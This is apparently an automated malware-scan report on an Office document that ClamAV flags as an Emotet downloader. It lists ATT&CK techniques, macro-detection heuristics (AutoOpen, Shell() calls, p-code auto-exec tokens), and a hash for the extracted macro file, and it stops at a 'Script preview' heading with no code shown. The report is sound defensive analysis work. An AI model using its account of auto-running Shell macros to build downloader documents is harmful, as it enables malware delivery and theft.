MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that calls the Shell() function. ClamAV identifies it as Doc.Downloader.Emotet-6877379-0, strongly suggesting it is a downloader for the Emotet banking trojan. The VBA script is heavily obfuscated, but the combination of AutoOpen and Shell() indicates an attempt to execute external code, most likely to download and run a secondary payload.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6877379-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6877379-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11168 bytes | 1b44683bffdbe1d6e974181739b0eb90b91b24c5a7dff91ae19b1f21b1668070 |
Script preview (first 1,000 lines of the extracted script):